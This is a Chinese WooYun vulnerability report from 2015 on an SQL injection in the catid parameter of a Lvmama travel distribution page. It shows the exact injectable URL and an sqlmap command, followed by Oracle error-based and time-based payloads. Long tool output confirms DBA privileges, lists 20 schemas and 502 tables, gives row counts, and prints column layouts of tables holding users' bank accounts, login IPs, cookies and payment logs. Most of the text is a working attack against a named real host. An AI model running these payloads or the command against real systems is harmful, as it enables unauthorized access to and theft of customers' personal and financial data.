当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152911

漏洞标题:驴妈妈旅游网某站某处存在SQL注入(DBA权限+20个库+400多用户+18个管理员+数万记录信息)

相关厂商:驴妈妈旅游网

漏洞作者: 路人甲

提交时间:2015-11-09 09:09

修复时间:2015-12-24 17:58

公开时间:2015-12-24 17:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开

简要描述:

突然看到公开的漏洞,有很多驴妈妈旅游网了,也来测试看看,什么都不懂!~~~
这个是要验证登录的么?或许不要登录就可以看到吧,既然如此,就测试测试!~~~

详细说明:

会有礼物送的么?
注入点:
http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700
catid存在注入,我们添加英文符号撇,会返回错误,疑似存在注入
在没有增加--level 3之前测试,catid存在注入,但是测试不出来,添加--level 3后,顺利出来了!~~~

sqlmap.py -u "http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700" --threads 10 --dbms "Oracle" --level 3 --current-user --current-db --is-dba


2.jpg


3.jpg


4.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: catid
Type: error-based
Title: Oracle error-based - Parameter replace
Payload: area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT UPPER(XMLT
ype(CHR(60)||CHR(58)||CHR(113)||CHR(105)||CHR(109)||CHR(98)||CHR(113)||(SELECT (
CASE WHEN (1434=1434) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(98)
||CHR(108)||CHR(113)||CHR(62))) FROM DUAL)&orderby=3&minprice=100&maxprice=700
Type: AND/OR time-based blind
Title: Oracle time-based blind - Parameter replace
Payload: area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT (CASE WHEN
(7573=7573) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(100)||CHR(97)||CHR(120
),5) ELSE 7573 END) FROM DUAL)&orderby=3&minprice=100&maxprice=700
---
[01:35:19] [INFO] the back-end DBMS is Oracle
web application technology: Apache, JSP
back-end DBMS: Oracle
[01:35:19] [INFO] fetching current user
[01:35:19] [INFO] retrieved: SAAS14
current user: 'SAAS14'
[01:35:19] [INFO] fetching current database
[01:35:19] [INFO] resumed: SAAS14
[01:35:19] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SAAS14'
[01:35:19] [INFO] testing if current user is DBA
current user is DBA: True
[01:50:25] [INFO] the SQL query used returns 20 entries
[01:50:25] [INFO] starting 10 threads
[01:50:25] [INFO] resumed: CTXSYS
[01:50:25] [INFO] resumed: DBSNMP
[01:50:25] [INFO] resumed: DMSYS
[01:50:25] [INFO] resumed: EXFSYS
[01:50:25] [INFO] resumed: MDSYS
[01:50:25] [INFO] resumed: OLAPSYS
[01:50:25] [INFO] resumed: ORDSYS
[01:50:25] [INFO] resumed: OUTLN
[01:50:25] [INFO] resumed: SAAS15
[01:50:25] [INFO] resumed: SAAS14
[01:50:25] [INFO] resumed: SAAS17
[01:50:25] [INFO] resumed: SAAS16
[01:50:25] [INFO] resumed: SAAS19
[01:50:25] [INFO] resumed: SAAS18
[01:50:25] [INFO] resumed: SYS
[01:50:25] [INFO] resumed: SYSMAN
[01:50:25] [INFO] resumed: SYSTEM
[01:50:25] [INFO] resumed: TSMSYS
[01:50:25] [INFO] resumed: WMSYS
[01:50:25] [INFO] resumed: XDB
available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SAAS14
[*] SAAS15
[*] SAAS16
[*] SAAS17
[*] SAAS18
[*] SAAS19
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SAAS14
[502 tables]
+--------------------------------+
| AD_CONTENT |
| AD_PAGE |
| AD_SEAT |
| AD_SEAT_IMG |
| AD_SEAT_LINK |
| ALITRIP_HOTEL |
| ALITRIP_HOTEL_LOG |
| ALITRIP_HOTEL_ORDER |
| ALITRIP_HOTEL_ORDER_LOG |
| ALITRIP_HOTEL_PRODUCT |
| ALITRIP_HOTEL_PROD_LOG |
| ALITRIP_HOTEL_PROD_SYNC_LOG |
| ALITRIP_MENPIAO_LOG |
| ALITRIP_MENPIAO_NEWLOG |
| ALITRIP_MENPIAO_ORDER |
| ALITRIP_MENPIAO_PRODUCT |
| ALITRIP_MENPIAO_RECEIVE |
| ALITRIP_ROOMTYPE |
| B2B_CHANNEL_PRICE |
| B2B_CHANNEL_PRICE_DAY |
| B2B_DEALER |
| B2B_DEALER_DAY |
| B2B_DEALER_LOG |
| B2B_FREETRAVEL |
| B2B_GRADE_PRICE |
| B2B_ORDER_REPORT |
| B2B_PACKAGE |
| B2B_SQPRICE |
| B2B_SQPRICE_DETAIL |
| B2B_TICKET |
| B2B_TICKET_2012 |
| B2B_TICKET_2013 |
| B2B_TICKET_AIRPORT |
| B2B_TICKET_BD |
| B2B_TICKET_CHANGE |
| B2B_TICKET_CHANGE_DETAIL |
| B2B_TICKET_CODE |
| B2B_TICKET_COND |
| B2B_TICKET_CONFIRM_LOG |
| B2B_TICKET_DETAIL |
| B2B_TICKET_DETAIL_2012 |
| B2B_TICKET_DETAIL_2013 |
| B2B_TICKET_EX |
| B2B_TICKET_FINISH_LOG |
| B2B_TICKET_HIS |
| B2B_TICKET_LOG |
| B2B_TICKET_PEOPLE |
| B2B_TICKET_STARTINFO |
| B2B_TICKET_TRAFFIC |
| B2C_CHANNEL_PRICE |
| B2C_TAOBAO_CONFIG |
| B2C_TAOBAO_LOG |
| B2C_TAOBAO_NOTIFYRECEIVEMSG |
| B2C_TAOBAO_ORDER |
| B2C_TAOBAO_ORDER_LOG |
| B2C_TAOBAO_PRODUCT |
| BANK_CITYCODE |
| BILL_TO_UFSOFT |
| CM_CHANNEL_PRICE |
| CM_ORDER_LOG |
| CM_PAY_BALANCE |
| CM_PAY_DRAWMONEY |
| CM_PAY_DRAWMONEY_LOG |
| CM_PAY_MONEY_LOG |
| CM_PAY_ORDER_LOG |
| CM_PROD_LOG |
| CM_SYNC_LOG |
| CM_SYNC_PROD_LOG |
| CM_USER |
| CM_USER_INFO |
| CRUEL_CODE_CUST |
| CRUEL_CODE_LIST |
| CRUEL_CODE_LOG |
| CRUEL_CODE_MESSAGE |
| CRUEL_CODE_POS |
| CRUEL_CODE_VERIFY |
| CRUEL_EXP_CODE |
| CRUEL_EXP_LIST |
| CTRIPTICKET_ORDER_LOG |
| CUSTVIEW_INFO |
| CUST_BALANCE_LOG |
| CUST_INFO_GROUP_CHANNEL |
| CUST_VIEW_INFO |
| DIY_MDD |
| DIY_MDD_TYPE |
| DIY_REL_MDD_PROD |
| EXPCODE_DETAIL |
| EXPCODE_LIST |
| GROUP_INFO |
| GROUP_INFO_2ND |
| GROUP_INFO_DETAIL_2ND |
| GROUP_INFO_ORDER |
| GROUP_ORDER |
| GROUP_ORDER_PEOPLE |
| GROUP_SET |
| GROUP_YY_ORDER |
| GROUP_YY_ORDER_COND |
| GROUP_YY_ORDER_DETAIL |
| GROUP_YY_ORDER_LOG |
| GROUP_YY_ORDER_PEOPLE |
| GRP_CHANNEL_PRICE |
| GRP_GRADE_PRICE |
| GRP_ORDER |
| GRP_ORDER_DETAIL |
| GRP_TICKET |
| GRP_TICKET_PRICE |
| HOTEL_PLAN |
| HOTEL_PLAN_PRICE |
| HOTEL_PLAN_TYPE |
| HOTEL_WEEKSHOW |
| IMP_CODE |
| IMP_CODE_DETAIL |
| IMP_CODE_LIST |
| INFO_AIRPORT |
| INFO_AIRPORT_FLIGHT |
| INFO_AIRPORT_NUM |
| INFO_AIRPORT_NUM_LIST |
| INFO_AIRPORT_PRICE |
| INFO_AIRPORT_SEAT |
| INFO_AUTO_PRICE |
| INFO_CAR |
| INFO_CAR_TYPE |
| INFO_CATALOG |
| INFO_COMMENT |
| INFO_CONDS |
| INFO_CTRIPTICKET |
| INFO_FREETRAVEL |
| INFO_FREETRAVEL_TREE |
| INFO_GROUP |
| INFO_GROUP_DETAIL |
| INFO_HOTEL |
| INFO_HOTEL_NUM |
| INFO_HOTEL_PRICE |
| INFO_HOTEL_SET |
| INFO_INSURANCE |
| INFO_INSURANCE_LOG |
| INFO_INSURANCE_ORDER |
| INFO_JD |
| INFO_MEITUAN |
| INFO_NEWS |
| INFO_NEWS_READLOG |
| INFO_PLAN_PRICE |
| INFO_PROD |
| INFO_QUNAR_CONFIG |
| INFO_QUNAR_HOTEL |
| INFO_QUNAR_VIEW |
| INFO_TB_PRICE |
| INFO_TICKET |
| INFO_TICKET_CANCEL |
| INFO_TICKET_COND |
| INFO_TICKET_CUST |
| INFO_TICKET_DETAIL |
| INFO_TICKET_EX |
| INFO_TICKET_MAILTEMP |
| INFO_TICKET_NUM |
| INFO_TICKET_NUM_FOREX |
| INFO_TICKET_PRICE |
| INFO_TICKET_PRICE_FOREX |
| INFO_TICKET_REL |
| INFO_TICKET_RELAREA |
| INFO_TICKET_RELCAT |
| INFO_TICKET_RELVIEW |
| INFO_TICKET_REL_CUST |
| INFO_TOGO |
| INFO_TRAFFIC |
| INFO_TRAFFIC_NUM |
| INFO_TRAFFIC_NUM_LIST |
| INFO_TRAFFIC_PLACE |
| INFO_TRAFFIC_PRICE |
| INFO_TRAFFIC_SEAT |
| INFO_TRAFFIC_STATION |
| INFO_TRAFFIC_TIMES |
| INFO_TRAVEL |
| INFO_TRAVEL_CYCLE |
| INFO_TRAVEL_CYCLE_AUTO |
| INFO_TRAVEL_JOURNEY |
| INFO_TRAVEL_PRICE |
| INFO_TRAVEL_SEAT |
| INFO_TUNIU |
| INFO_VENUE |
| INFO_VENUE_NUM |
| INFO_VISA |
| INTERFACE_AILVTONG_LOG |
| INTERFACE_AIZHAOPIAO_LOG |
| INTERFACE_BEIZHU_LOG |
| INTERFACE_CAIHUISHIJIE_LOG |
| INTERFACE_CHANGLU_LOG |
| INTERFACE_CHANGLV_LOG |
| INTERFACE_CHANGYOUTONG_LOG |
| INTERFACE_CTRIP_HOLIDAY |
| INTERFACE_DADONGRT_LOG |
| INTERFACE_DDRT_LOG |
| INTERFACE_DIANPING_LOG |
| INTERFACE_DMZH_LOG |
| INTERFACE_DUMUQIAO_LOG |
| INTERFACE_FURONGYUAN_LOG |
| INTERFACE_FZG_BIZZONE |
| INTERFACE_GLYD |
| INTERFACE_HKDISNEY_LOG |
| INTERFACE_HOTEL |
| INTERFACE_HOTEL_BE_PRODUCT |
| INTERFACE_HOTEL_DDS_LOG |
| INTERFACE_HOTEL_DDS_ORDER_LOG |
| INTERFACE_HOTEL_JL |
| INTERFACE_HOTEL_JL_LOG |
| INTERFACE_HOTEL_JL_ORDER_LOG |
| INTERFACE_HOTEL_LTJL_LOG |
| INTERFACE_HOTEL_LTJL_ORDER_LOG |
| INTERFACE_HOTEL_LTJL_PRODUCT |
| INTERFACE_HOTEL_LYY_ORDER_LOG |
| INTERFACE_HOTEL_PRODUCT |
| INTERFACE_HOTEL_XH_LOG |
| INTERFACE_HOTEL_XH_ORDER_LOG |
| INTERFACE_HOTEL_XH_PRODUCT |
| INTERFACE_HUANQIU_LOG |
| INTERFACE_HUANTAOYOU_LOG |
| INTERFACE_HUAXIAPIAOLIAN_LOG |
| INTERFACE_IHUIU_LOG |
| INTERFACE_IMAGECO |
| INTERFACE_IMAGECO_CUST |
| INTERFACE_JD_CHANNEL_LOG |
| INTERFACE_JD_COUPON_PWD |
| INTERFACE_JIDIAOTONG_LOG |
| INTERFACE_KUIYUAN_LOG |
| INTERFACE_KUXIU_LOG |
| INTERFACE_LEXIAOXIANG_LOG |
| INTERFACE_LINE |
| INTERFACE_LINGNAN_LOG |
| INTERFACE_LIULIUKA_LOG |
| INTERFACE_LLK_CODE |
| INTERFACE_LLK_CUST |
| INTERFACE_LOG |
| INTERFACE_LONG |
| INTERFACE_LVMAMA_LOG |
| INTERFACE_MAP |
| INTERFACE_MEITUAN_DETAIL |
| INTERFACE_MEITUAN_LOG |
| INTERFACE_MJLD_LOG |
| INTERFACE_MOUNTWG_LOG |
| INTERFACE_MTS |
| INTERFACE_MTS_LOG |
| INTERFACE_PIAOFUTONG_LOG |
| INTERFACE_PIAOGJ_LOG |
| INTERFACE_PIAOGONGCHANG_LOG |
| INTERFACE_PIAOWUBA_LOG |
| INTERFACE_PIAOZHIJIA_LOG |
| INTERFACE_PRICE_RULE |
| INTERFACE_PROD_SYNC_LOG |
| INTERFACE_QUNAR |
| INTERFACE_QUNAR_HISTORY_LOG |
| INTERFACE_QUNAR_HISTOY_LOG |
| INTERFACE_QUNAR_HOLIDAY |
| INTERFACE_QUNAR_HOLIDAY_LOG |
| INTERFACE_QUNAR_HOTEL |
| INTERFACE_QUNAR_HOTEL_LOG |
| INTERFACE_QUNAR_INVOICE |
| INTERFACE_QUNAR_LINE_LOG |
| INTERFACE_QUNAR_LOG |
| INTERFACE_QUNAR_MOVE |
| INTERFACE_QUNAR_SUPPLIER_LOG |
| INTERFACE_SHANHAIGUAN_LOG |
| INTERFACE_SHOUKEYI_LOG |
| INTERFACE_SXLY |
| INTERFACE_SYNC_LOG |
| INTERFACE_TIANGUI_LOG |
| INTERFACE_TIANKE_LOG |
| INTERFACE_TICKET |
| INTERFACE_TONGCHENG_LOG |
| INTERFACE_TOURMART_LOG |
| INTERFACE_TUNIU_LOG |
| INTERFACE_VISITBEIJING_LOG |
| INTERFACE_WEIXUN_LOG |
| INTERFACE_WULONG_LOG |
| INTERFACE_XIAONIREN_LOG |
| INTERFACE_XIECHENG_LOG |
| INTERFACE_XINAIMOKE_LOG |
| INTERFACE_YANGGUANGLZ_LOG |
| INTERFACE_YINLVTONG_LOG |
| INTERFACE_YUANFAN_LOG |
| INTERFACE_YYJQ_LOG |
| INTERFACE_ZHONGJINGXIN_LOG |
| JOURNEY |
| JOURNEY_COMMENT |
| JOURNEY_DETAIL |
| JOURNEY_PRO_DETAIL |
| LVMAMA_CHUANHUO_LOG |
| LVMAMA_PRODUCT_INFO |
| LVMAMA_PRODUCT_LIST |
| LVMAMA_PUSH_LOG |
| LVMAMA_UPDATE_FLAG |
| LVMAMA_VIEW |
| LVMAMA_VIEW_INFO |
| LVWUTONGCODE_QUEUE |
| LVWUTONG_SMSMODE |
| LVWUTONG_TMPCODE |
| LVWUTONG_TMPCODE_GROUP |
| LVWUTONG_TMPCODE_LOG |
| LVWUTONG_TMPCODE_USE |
| NANHU_DEPTSET |
| ONLINE_DEBUG_LOG |
| ORDER_ABNORMAL_LOG |
| ORDER_API_PAY |
| ORDER_CHANGE_LOG |
| ORDER_LOG |
| ORDER_RELATION_LOG |
| PAY_BALANCE |
| PAY_CREDIT_FEE |
| PAY_DRAWMONEY |
| PAY_MOMEY_LOG |
| PAY_ORDER_LOG |
| PLAN_TABLE |
| QUNAR_PRICE_CACHE |
| RECE_APP |
| RECE_APP_DETAIL |
| RECE_INVOICE |
| RECE_INVOICE_DETAIL |
| RECE_PAYMENT_DETAIL |
| RECE_PAYMENT_LIST |
| RECE_STATEMENT_LIST |
| RUPD$_B2B_SETTLE_METHOD |
| RUPD$_B2B_TICKET |
| RUPD$_B2B_TICKET_DETAIL |
| RUPD$_HOTEL_BRAND |
| RUPD$_HOTEL_DISTRICT |
| RUPD$_HOTEL_INFO |
| RUPD$_INFO_AREA |
| RUPD$_INFO_AREA_EX |
| RUPD$_INFO_BANK |
| RUPD$_INFO_CAR |
| RUPD$_INFO_CONDS |
| RUPD$_INFO_HOTEL |
| RUPD$_INFO_NEWS |
| RUPD$_INFO_PROD |
| RUPD$_INFO_TICKET |
| RUPD$_INFO_TICKET_CANCEL |
| RUPD$_INFO_TICKET_COND |
| RUPD$_INFO_TICKET_DETAIL |
| RUPD$_INFO_TICKET_EX |
| RUPD$_INFO_TICKET_PRICE |
| RUPD$_INFO_TICKET_RELAREA |
| RUPD$_INFO_TICKET_RELVIEW |
| RUPD$_INFO_TRAVEL |
| RUPD$_INFO_VISA |
| RUPD$_INFO_VISA_SORT |
| RUPD$_INTERFACE_LLK_CUST |
| RUPD$_SAAS_PERMISSION |
| RUPD$_SAAS_USER_INFO |
| RUPD$_TB_USR_INFO |
| RUPD$_TB_VIEW_INFO |
| RUPD$_USR_TAG |
| RUPD$_USR_VIEW |
| SAAS_AREA_SUB |
| SAAS_BUY_LOG |
| SAAS_CLUSTER |
| SAAS_DATAMAN |
| SAAS_INFO_AREA |
| SAAS_INFO_SUB |
| SAAS_NEWS |
| SAAS_NEWS_SORT |
| SAAS_NOTICE |
| SAAS_ORDER_SOURCE |
| SAAS_PAY_DRAWMONEY |
| SAAS_PAY_DRAWMONEY_LOG |
| SAAS_PAY_PRODUCT_TYPE |
| SAAS_PAY_SERVICE |
| SAAS_TABLE_SQL |
| SAAS_VAP_ORDER |
| SAAS_VAP_PRODUCT |
| SAAS_VIEW_SUB |
| SETTLE_ACCOUNT |
| SETTLE_PAYABLE |
| SETTLE_PAYABLE_DETAIL |
| SETTLE_PAYABLE_LIST |
| SETTLE_PAYAPP |
| SETTLE_PAYAPP_DETAIL |
| SETTLE_STATEMENT_DETAIL |
| SETTLE_STATEMENT_LIST |
| SITE_IP2 |
| SMS_CONSUME_LOG |
| SMS_GETMONEY_LOG |
| STOCK_ADD_LOG |
| STOCK_REPORT_DAY |
| SYS_CURRENCY_RATE |
| SYS_FEE_LOG |
| SYS_REFER |
| SYS_REPORT_DAY |
| SYS_SMS_LOG |
| SYS_SQL_HISTORY |
| SYS_SQL_QUEUE |
| TB_CONSUME_CODE |
| TB_RECEIVE_LOG |
| TEST_DB |
| TOUREASY_AREA |
| TOUREASY_LINE |
| TOUREASY_ORDER_INFO_PINGZHENG |
| TOUREASY_ORDER_QUEUE |
| TOUREASY_PRODUCT |
| TOUREASY_USR_LOG |
| TOUR_GUIDE |
| TRAFFIC_TO_TICKET |
| T_EQUIP |
| T_EQUIPSUB |
| T_LANDMARK |
| T_MATERIA |
| T_PRO_COMMON_NUM |
| T_PRO_COMMON_PRICE |
| T_PRO_DETAIL_COURSE |
| T_REGIONS |
| T_REGIONS_QD |
| T_REGIONS_SUBWAY |
| T_SPORTTYPE |
| T_VENUE |
| T_VENUE_COUNT |
| T_VENUE_PRICE |
| T_VENUE_RECORD |
| T_VENUE_SUB |
| UF_SOFT_QUEUE |
| UF_SOFT_SETTLE_PAYABLE |
| UF_SOFT_USR_CREDIT_LOG |
| UNIONPAY_CONFIG |
| UNIONPAY_TRADE_LOG |
| UPDATE_FOREXPRICE_LOG |
| USR_ACCOUNT |
| USR_ACCOUNT_LOG |
| USR_ACCOUNT_SET |
| USR_ATTENTION |
| USR_BALANCE_LOG |
| USR_BOOK |
| USR_CHECKIN_TYPE |
| USR_CREDIT |
| USR_CREDIT_LOG |
| USR_DEALER |
| USR_DEPT |
| USR_DIST |
| USR_DOCUMENT_TEMP |
| USR_ENTERPRISE_TAG |
| USR_GETPASS_LOG |
| USR_GRADE |
| USR_HOTEL_COND |
| USR_INFO |
| USR_INFO_B2C |
| USR_INFO_EXPRESS |
| USR_INTERFACE |
| USR_INTERFACE_INFO |
| USR_LOG |
| USR_LOGIN |
| USR_LOGIN_LOG |
| USR_LOG_2011 |
| USR_LOG_2012 |
| USR_LOG_2013 |
| USR_MAILTEMP_LIST |
| USR_MANAGER_USER |
| USR_MEMBER |
| USR_MENU |
| USR_MSG |
| USR_MSG_COMMENT |
| USR_MSG_MONEY |
| USR_PAGES |
| USR_POWER_AREA |
| USR_PRINT_TEMP |
| USR_PROD_CODE |
| USR_PROD_WHILE_AREA |
| USR_PROD_WHILE_DETAIL |
| USR_PROD_WHILE_GROUP |
| USR_PROD_WHILE_LIST |
| USR_PROD_WHILE_TREE |
| USR_SCORE |
| USR_SCORE_DETAIL |
| USR_SCORE_LOG |
| USR_SCORE_RULE |
| USR_VIEW_BAK |
| USR_VIEW_BOUNTY |
| USR_VIEW_COLUMN |
| USR_VIEW_COPY |
| USR_VIEW_LINK |
| USR_VIEW_MSG |
| USR_VIEW_MSG_HIS |
| USR_VIEW_NAV |
| USR_VIEW_PAGE |
| USR_VIEW_TEMPLATE |
| WX_AD |
| WX_AD_DETAIL |
| WX_AD_SEND_LOG |
| WX_COUPON_SCEEN |
| WX_COUPON_SEND_LOG |
| WX_KEY |
| WX_MSG |
| WX_MSG_TEMP |
| WX_ORDER_TASK |
| WX_SCENE |
| WX_SCENE_IN |
| WX_SCENE_LOG |
| WX_SEND_HISTORY |
| WX_SEND_QUEUE |
| WX_SET |
| WX_TREE |
| WX_USER_INFO |
| XIECHENG_HOTEL_INFO |
| XIECHENG_HOTEL_LOG |
| XIECHENG_HOTEL_ORDER |
| XIECHENG_HOTEL_STATE |
| INTERFACE_KUIYUAN_LOG |
+--------------------------------+
Database: SAAS14
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| LVMAMA_PUSH_LOG | 2502247 |
| LVMAMA_VIEW | 69067 |
| USR_LOG | 56983 |
| CM_ORDER_LOG | 49229 |
| B2B_TICKET_PEOPLE | 32502 |
| PAY_ORDER_LOG | 29363 |
| B2B_TICKET | 27955 |
| B2B_TICKET_DETAIL | 27955 |
| B2B_TICKET_EX | 27926 |
| CM_SYNC_LOG | 27562 |
| INTERFACE_LVMAMA_LOG | 25698 |
| LVMAMA_PRODUCT_LIST | 23209 |
| INFO_TICKET | 23208 |
| ORDER_LOG | 22026 |
| INFO_TICKET_RELVIEW | 16473 |
| LVMAMA_CHUANHUO_LOG | 14566 |
| USR_LOGIN_LOG | 11318 |
| PAY_BALANCE | 3750 |
| PAY_MOMEY_LOG | 2669 |
| B2B_TICKET_CHANGE | 1306 |
| CM_SYNC_PROD_LOG | 856 |
| B2B_CHANNEL_PRICE | 626 |
| LVMAMA_VIEW_INFO | 610 |
| INFO_TICKET_NUM | 559 |
| USR_LOGIN | 431 |
| INFO_TICKET_CUST | 415 |
| B2B_CHANNEL_PRICE_DAY | 382 |
| USR_INFO | 377 |
| USR_CREDIT_LOG | 369 |
| WX_SCENE_LOG | 308 |
| USR_GETPASS_LOG | 208 |
| INFO_TICKET_EX | 136 |
| LVMAMA_PRODUCT_INFO | 72 |
| USR_ATTENTION | 65 |
| ORDER_ABNORMAL_LOG | 50 |
| WX_USER_INFO | 45 |
| USR_INFO_B2C | 44 |
| USR_INTERFACE_INFO | 41 |
| WX_AD_DETAIL | 23 |
| USR_MEMBER | 18 |
| INFO_TICKET_PRICE | 6 |
| WX_AD | 5 |
| USR_CREDIT | 4 |
| WX_AD_SEND_LOG | 4 |
| WX_MSG_TEMP | 2 |
| CUST_INFO_GROUP_CHANNEL | 1 |
| INFO_CONDS | 1 |
| INFO_TICKET_CANCEL | 1 |
| INTERFACE_XIECHENG_LOG | 1 |
| LVMAMA_UPDATE_FLAG | 1 |
| SAAS_DATAMAN | 1 |
| USR_DOCUMENT_TEMP | 1 |
| USR_INFO_EXPRESS | 1 |
+-------------------------+---------+
Database: SAAS14
Table: USR_LOG
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| CUST_ID | NUMBER |
| LOG_DATE | DATE |
| LOG_DESC | VARCHAR2 |
| LOG_NUM | VARCHAR2 |
| LOG_TYPE | NUMBER |
| PARENT_CUST_ID | NUMBER |
| USER_ID | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_LOGIN_LOG
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| COOKIEID | VARCHAR2 |
| CUST_ID | NUMBER |
| IP | VARCHAR2 |
| LOGIN_DATE | DATE |
| LOGIN_TYPE | NUMBER |
| PARENT_CUST_ID | NUMBER |
| USER_ID | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_INFO_EXPRESS
[9 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| ACCOUNT_NO | VARCHAR2 |
| CUST_ID | NUMBER |
| FROM_ADDRESS | VARCHAR2 |
| FROM_COM | VARCHAR2 |
| FROM_MAN | VARCHAR2 |
| FROM_TEL | VARCHAR2 |
| PARENT_CUST_ID | NUMBER |
| SHIP_INFO | VARCHAR2 |
| UPDATE_DATE | DATE |
+----------------+----------+
Database: SAAS14
Table: USR_CREDIT
[8 columns]
+----------------+--------+
| Column | Type |
+----------------+--------+
| ALL_CREDIT_NUM | NUMBER |
| CREATE_DATE | DATE |
| CREDIT_CUST_ID | NUMBER |
| CREDIT_NUM | NUMBER |
| CREDIT_TYPE | NUMBER |
| CUST_ID | NUMBER |
| ID | NUMBER |
| USE_CREDIT_NUM | NUMBER |
+----------------+--------+
Database: SAAS14
Table: USR_INFO
[95 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| KEY | VARCHAR2 |
| ACCOUNT | VARCHAR2 |
| ACCOUNT_NAME | VARCHAR2 |
| AGREEMENT_DATE | DATE |
| AGREEMENT_IP | VARCHAR2 |
| AGREEMENT_USER | VARCHAR2 |
| ANDROID_UID | VARCHAR2 |
| AREA_ID | NUMBER |
| ATTENT_COUNT | NUMBER |
| BANK_ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NO | VARCHAR2 |
| BANK_CITY | VARCHAR2 |
| BANK_CITYCODE | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| BANK_PROVINCE | VARCHAR2 |
| BANK_TYPE | VARCHAR2 |
| BEIANHAO | VARCHAR2 |
| CHECK_PRINT_NUM | NUMBER |
| CHECK_PRINT_PRICE | VARCHAR2 |
| CONTRACT_END_DATE | DATE |
| CONTRACT_PERSON | VARCHAR2 |
| CONTRACT_START_DATE | DATE |
| CURRENCY_TYPE | NUMBER |
| CUST_CODE | VARCHAR2 |
| CUST_DESC | CLOB |
| CUST_GAT_FEE | NUMBER |
| CUST_GAT_LIMIT | NUMBER |
| CUST_GRADE | NUMBER |
| CUST_ID | NUMBER |
| CUST_NAME | VARCHAR2 |
| CUST_PAY_FEE | NUMBER |
| CUST_TYPE | NUMBER |
| CUST_WEBSITE | VARCHAR2 |
| DEPOSIT | NUMBER |
| DYCON | VARCHAR2 |
| DYSHOW | NUMBER |
| FEE | NUMBER |
| GET_MONEY_MODE | NUMBER |
| INTERFACE_PAY_TYPE | NUMBER |
| IS_B2B | NUMBER |
| IS_CHECK | NUMBER |
| IS_CHECK_VALUES | VARCHAR2 |
| IS_CONFIRM_ORDER | NUMBER |
| IS_DISCOUNT | NUMBER |
| IS_GAT_MONEY | NUMBER |
| IS_GROUP | NUMBER |
| IS_POST | NUMBER |
| IS_PRODMANAGER | NUMBER |
| IS_SAAS | NUMBER |
| IS_SENDSMS | NUMBER |
| IS_WHILE | NUMBER |
| LAST_IP | VARCHAR2 |
| LINK_ADDRESS | VARCHAR2 |
| LINK_EMAIL | VARCHAR2 |
| LINK_FAX | VARCHAR2 |
| LINK_MOBILE | VARCHAR2 |
| LINK_NAME | VARCHAR2 |
| LINK_PHONE | VARCHAR2 |
| LINK_QQ | VARCHAR2 |
| LINK_SOURCE | VARCHAR2 |
| LOGIN_COUNT | NUMBER |
| LOGO | VARCHAR2 |
| MANAGER_MEMO | CLOB |
| ORDER_COUNT | NUMBER |
| ORDER_CUST_POWER | NUMBER |
| ORDER_MONEY | NUMBER |
| ORDER_POWER_FIELD | VARCHAR2 |
| ORDER_TICKET | NUMBER |
| PARENT_AGENT_ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PAY_MODE | NUMBER |
| PRICESTATE_PUSHMAIL | VARCHAR2 |
| PROD_COUNT | NUMBER |
| REG_DATE | DATE |
| REG_IP | VARCHAR2 |
| REMARK | VARCHAR2 |
| REPORT_POWER | VARCHAR2 |
| RETURN_MODE | NUMBER |
| SALE_CHANNEL | VARCHAR2 |
| SALE_COUNT | NUMBER |
| SALE_MONEY | NUMBER |
| SALE_TICKET | NUMBER |
| SALE_TYPE | NUMBER |
| SEAL_PATH | VARCHAR2 |
| SENDMSG_MOBILE | VARCHAR2 |
| SENDMSG_SMS | VARCHAR2 |
| SERVICE_FEE_PAY | NUMBER |
| SOURCE_URL | VARCHAR2 |
| STATE | NUMBER |
| STOP_DATE | DATE |
| STOP_IP | VARCHAR2 |
| STOP_USER | VARCHAR2 |
| USER_ID | VARCHAR2 |
| VIP | NUMBER |
| WHILE_RELCODE | VARCHAR2 |
+---------------------+----------+
Database: SAAS14
Table: PAY_MOMEY_LOG
[17 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| CUR_BALANCE | NUMBER |
| CUST_ID | NUMBER |
| ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PAY_ACCOUNT | VARCHAR2 |
| PAY_BALANCE_ID | NUMBER |
| PAY_DATE | DATE |
| PAY_LOG | CLOB |
| PAY_NUM | NUMBER |
| PAY_SERVICE | VARCHAR2 |
| PAY_SERVICE_ORDER_ID | VARCHAR2 |
| PAY_TYPE | NUMBER |
| REC_BALANCE | NUMBER |
| STATE | NUMBER |
| USER_ID | VARCHAR2 |
| USER_REMARK | CLOB |
